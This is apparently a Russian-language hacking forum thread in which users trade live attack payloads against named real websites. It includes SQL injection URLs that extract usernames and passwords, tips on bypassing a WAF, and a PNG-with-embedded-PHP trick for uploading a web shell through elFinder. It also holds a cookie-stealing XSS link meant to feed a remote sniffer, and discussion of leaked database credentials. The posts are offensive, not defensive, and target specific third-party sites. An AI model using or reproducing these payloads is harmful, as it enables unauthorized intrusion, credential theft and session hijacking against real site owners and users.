Code: ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53 version 5.1.72-cll-lve Помогите. WAF фильтрует information_schema.tables. Как обойти?
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ? Code: http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF. Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками? Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
Нашел вот такую уязвимость Code: http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+-- Нашел username,password но админку так и не смог найти(( Code: http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+-- Записать файл не получается. Что нибудь можно тут сделать? Помогите начинающему
В админке сайта есть скрипт elFinder. Пытаюсь через него загрузить php файл. Скрипт, походу, читает заголовки mime т.к. Файлы типа .php и html не пропускает. Если создать простейший скрипт аля <?php echo "1";?> не пропустит. Но если изображение переименовать в test.php то с легкостью загружает. Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот? Если файл test.php переименовать в test.jpg не пропускает так же...
опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть phpmyadmin.oscar-k.dk content.oscar-k.dk ftp://ftp.oscar-k.dk
Проверьте, не фильтрует ли конструкцию <? eval('echo 1;'); вообщем, нужно выяснить, на какие символы ругается waf
Он фильтрует не содержимое файла, без разницы что там, eval или echo. Он фильтрует заголовки код типа пропустил но выполнить не удалось Code: ‰PNG IHDR ђwSЮ pHYs љњ tIMEЯ ’ьdп IDATЧcшяя? ююЬМYз IEND®B`‚ <?php echo 'hello'; ?>
Спасибо, но как вы нашли? Софт или сервис? Перепробовал много, но не нашел(( PS Да, и еще если не получится раcшифровать пароль, то есть еще какие нибудь варианты?
Спасибо!!!!Вывод ошибок через extractvalue я видел, а на прямой вывод что-то не получается составить запрос. Может подскажешь?!!!
Спасибо, но хотелось бы знать что откуда. Если не трудно хотя-бы вкратце - как найти админку и откуда seba:12345 (в базе я нашел только юзера oscar).
нашол такую хсс при нажатие в правом углу на закрытие появляется алерт http://www.torrentsmd.com/smilies_popup.php?text=3&container='+alert(+document.cookie)+'&lang=ro где типерь запихнуть сылку сниффера помоги пожалуста http://hacker-lab.com/sniffer/images/251095_3.jpg
Code: place=1')sub2 WHERE 1.0Union/*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20--+ Инъекция в table_references.
ребят вот нашёл сайт, и перейдя по правельной ссылки мне выдаёт файл config и там настройки подключения к бд DATABASE HOSTNAME - есть DATABASE USERNAME - есть DATABASE PASSWORD - есть DATABASE NAME - есть DATABASE PORT - есть И ещё асякие конфигурации там вроде даже есть привязка по IP адресам Так вот в чём вопрос это считается серьёзной уязвимостью ? (если да то на сколько она серьёзная)